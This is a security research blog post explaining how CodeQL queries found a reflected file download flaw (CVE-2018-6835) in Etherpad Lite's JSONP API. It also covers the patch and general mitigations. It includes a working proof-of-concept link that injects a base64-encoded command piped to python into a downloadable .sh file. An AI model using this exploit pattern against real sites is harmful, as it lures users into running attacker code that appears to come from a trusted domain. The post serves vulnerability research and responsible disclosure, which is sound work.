Etherpad reflected file download: Vulnerability hunting with CodeQL (CVE-2018-6835)

In this post I’ll explain how we can detect a type of vulnerability known as reflected file download (RFD) using CodeQL. As an example, I’ll use a vulnerability that I recently reported in the popular collaborative online editor Etherpad.

Details of the vulnerability in Etherpad (CVE-2018-6835)

This vulnerability affects versions of Etherpad Lite prior to 1.6.3 and is caused by the lack of sanitization in the name of the JSONP callback function used in the HTTP API. This allows a URL to be crafted in a way that, when visited, triggers an executable file to be downloaded that appears to originate from the host of the Etherpad application. The vulnerability has been assigned CVE-2018-6835.

Reflected file download (RFD)

Reflected file download (RFD) is a relatively new attack vector discovered in 2014 by Oren Hafif. It has since affected multiple organizations and applications, including Google. This attack works very similarly to the more familiar cross site scripting (XSS), which relies on the victim clicking on a URL link that comes from a trusted domain. In the case of RFD, instead of running JavaScript in the victim’s browser, an executable file will be offered to the user as a download. As the file appears to originate from a trusted domain, the victim may then think that it is safe to run the file. The main ingredients in an RFD vulnerability are:

User input in the URL being reflected back in the response.
The vulnerable URL is permissive and allows the file name to be manipulated.

If the vulnerable application serves its output using a Content-Disposition: attachment HTTP header, a user’s browser will automatically offer the injected content as a downloadable file. If the filename attribute in this header is not set, then the file name and extension can be manipulated by the attacker to make the file executable on some platforms. If the Content-Disposition: attachment header is not provided by the application, an attacker could craft the link using the download attribute in order to force the user’s browser to treat the injected content as a download, and set the filename. For example:

<a href="http://example.com/specially-crafted-URL" download="RunMe.bat">You can trust this link</a>

Using CodeQL to find the RFD vulnerability in Etherpad

Let’s take a look at the vulnerability in Etherpad.

Using CodeQL, we can look for user input being reflected back in the server’s response. To begin with, we’ll search for functions that are likely to be handlers of HTTP requests. In JavaScript, it is fairly common to name the variable that represents a request req and a variable that represents a response res. A function that handles a request will normally take these as parameters. The CodeQL library for JavaScript analysis provides a Function class to model functions. To start our exploration we can extend that Function class in order to find functions that contain two variables representing the request and response:

class LikelyRouteHandler extends Function {
  Variable req;
  Variable res;

  LikelyRouteHandler() {
    req = getParameter(0).(SimpleParameter).getVariable() and req.getName() = "req" and
    res = getParameter(1).(SimpleParameter).getVariable() and res.getName() = "res"
  }
}

Running a query that looks for such functions gives me 37 results — let’s try to make the query more specific. If the variable res in these methods is indeed an HTTP response, then res will be passed as a parameter to the send method which sends the response to the browser. Using CodeQL we can track the flow of req and find where it is used as an argument of this send method. As is the case with Java and C++ queries, this can be achieved through CodeQL’s DataFlow library. Before we move on to that part, let’s add some methods to the LikelyRouteHandler definition to enable us to look for accesses to the req parameter, as well as calls to the send method of res.

  // Gets a method of `res` that sends an HTTP response.
  string getASendMethodName() {
    // res.send
    result = "send"
    or
    // or a method `m` such that there is an assignment `res.m = res.n` where `n`
    // is already known to be a send method
    exists (DataFlow::PropWrite pwn |
      pwn.getBase().asExpr() = res.getAnAccess() and
      pwn.getPropertyName() = result and
      pwn.getRhs().asExpr() = getASendMethodReference()
    )
  }

  // Gets a reference to `res.send` or some other known send method
  PropAccess getASendMethodReference() {
    result.getBase() = res.getAnAccess() and
    result.getPropertyName() = getASendMethodName()
  }

In the above code snippet, getASendMethodName looks for methods that are either simply called send, or methods that are assigned res.send (further down, I’ll describe why this is important!). For example:

res.send2 = res.send  // flag up `send2` as well
res.send3 = res.send2 // flag up `send3` as well

So, if we have res.someMethod = referenceToSend then res.someMethod is also a send method. In the QL language, the left hand side is identified as:

// Base of the property write is an access to the variable `res`
pwn.getBase().asExpr() = res.getAnAccess() and
// The name of the property should also be identified
pwn.getPropertyName() = result

The right hand side is given by the getASendMethodReference. Now a send method reference is something that is already known to refer to a send method, so its name should already have been a sendMethodName. We therefore define it as:

// Gets a reference to `res.send` or some other known send method
PropAccess getASendMethodReference() {
  result.getBase() = res.getAnAccess() and
  //Its name should already be a send method name
  result.getPropertyName() = getASendMethodName()
}

With this definition it becomes easy to identify calls to the send methods:

/. Gets a call to the send method
CallExpr getASendMethodCall() {
  result.getCallee() = getASendMethodReference()
}

Running a query to look for calls to the send method results in some interesting function names in Etherpad. It was worth taking the effort to look for assignments that use the send method!

We are now in a position to use CodeQL’s DataFlow library to track the flow between the request and the response in JavaScript code. Apart from general DataFlowConfiguration, the JavaScript library also comes with some specialized TaintTrackingConfiguration. For reflected type tracking, the ReflectedXss::Configuration, ReflectedXss::Source and ReflectedXss::Sink classes in semmle.javascript.security.dataflow.ReflectedXss are exactly what we need.

Before looking at the details, let’s take a step back and summarize what we’re trying to find. We’re looking for:

a method that handles requests and responses (using LikelyRouteHandler), that
has a parameter req containing potentially tainted data provided by the user, which
flows back into the response sent back to the user using a send method (or any alias)

In DataFlow terminology: we need to define the req parameter provided to a LikelyRouteHandler as a Data Flow source, and any argument to the send method as a Data Flow sink. We can extend the ReflectedXss::Source and ReflectedXss::Sink QL classes to achieve that:

// An argument passed to `res.send`, marked as an XSS sink
class LikelySendArgument extends ReflectedXss::Sink {
  LikelySendArgument() {
    asExpr() = any(LikelyRouteHandler rh).getASendMethodCall().getAnArgument()
  }
}

// An access to a request parameter, marked as an XSS source
class LikelyRequestParameter extends ReflectedXss::Source {
  LikelyRequestParameter() {
    exists (Expr base | base = asExpr().(PropAccess).getBase() |
      // either a property access on `req` itself
      base = any(LikelyRouteHandler rh).getRequestVariable().getAnAccess()
      or
      // or a more deeply nested property access
      base = any(LikelyRequestParameter p).asExpr()
    )
  }
}

The last step is to combine these definitions with a standard Data Flow query:

from ReflectedXss::Configuration xss, DataFlow::Node source, DataFlow::Node sink
where xss.hasFlow(sink, source)
select sink, "Cross-site scripting vulnerability due to $@.",
       source, "user-provided value"

Running the query on Etherpad using the LGTM query console returns three results. Closer inspection reveals that the results in apicalls.js are of particular interest: the JSONP callback name provided by the user is part of the response.

Testing on Etherpad Lite 1.6.2 reveals that indeed no input validation is performed on the jsonp parameter. For example:

jsonp

(Note that the above query results are actually for a patched version of Etherpad. The vulnerability was patched by introducing a check: isValidJSONPName, which can actually be seen in the query results.)

Crafting an RFD exploit

Now that we identified the unsanitized reflection, let’s try to create a malicious download link like those described by David Vassallo.

<a href="http://localhost:9001/api/1/test.sh?jsonp=echo cHJpbnQgJ0hlbGxvIFdvcmxkJwpwcmludCAncGF3bmQgOignCg==| base64 --decode | python||" download>Etherpad patch</a>

Note that test.sh in the above is non-existent, but Etherpad will present an unsuspecting user with a downloadable file test.sh upon visiting that URL:

download

The download appears to originate from the host of our Etherpad instance (in our case: localhost:9001). The user may therefore think that the file can be trusted. The file contains the following Bash script:

echo cHJpbnQgJ0hlbGxvIFdvcmxkJwpwcmludCAncGF3bmQgOignCg==| base64 --decode | python||({"code":3,"message":"no such function","data":null})

The last bit is a JSONP artifact that is not used when Bash executes test.sh. The base64-encoded string is a Python script that does the following:

print 'Hello World'
print 'pawnd :('

It is interesting to note that this fully works on Chrome. On Internet Explorer and Edge, the file that gets downloaded is called test.json; the browser changed the file extension based on the JSON response type. Firefox, on the other hand, does not offer any file to download at all.

Patch

As I mentioned before, Etherpad patched the vulnerability. Initially, they added a check using the isVarNameName method from the is-var-name module, but later on they switched to their own sanitizer, isValidJSONPName.

The DataFlow libraries allow for sanitizers like these to be taken into account: instances of tainted data flowing from a source to a sink via a sanitizer can be filtered will not appear in the query results.

To do so, we simply extend the QL class TaintTracking::AdditionalSanitizerGuardNode and override the sanitizes predicate:

class IsValidJSONPSanitizer extends TaintTracking::AdditionalSanitizerGuardNode, DataFlow::CallNode {
  IsValidJSONPSanitizer() {
    this = DataFlow::moduleMember("./isValidJSONPName", "check").getACall()
  }

  override predicate appliesTo(TaintTracking::Configuration cfg) {
    cfg instanceof ReflectedXss::Configuration
  }

  override predicate sanitizes(boolean outcome, Expr e) {
     outcome = true and
     e = getArgument(0).asExpr()
  }
}

Running the new query produces the expected result: the vulnerability is no longer flagged up.

Mitigation for RFD in general

To protect yourself (and your users) from reflected file downloads, make sure to:

Sanitize user input that is reflected into the response.
Use exact URL mapping and remove support for path parameters when possible.
Set a fixed file name when using the Content-Disposition header.

Disclosure timeline of CVE-2018-6835

29 Jan 2018: Initial private disclosure to John McLear of Etherpad.
3 Feb: Patched version (1.6.3) released.

Note: Post originally published on LGTM.com on March 29, 2018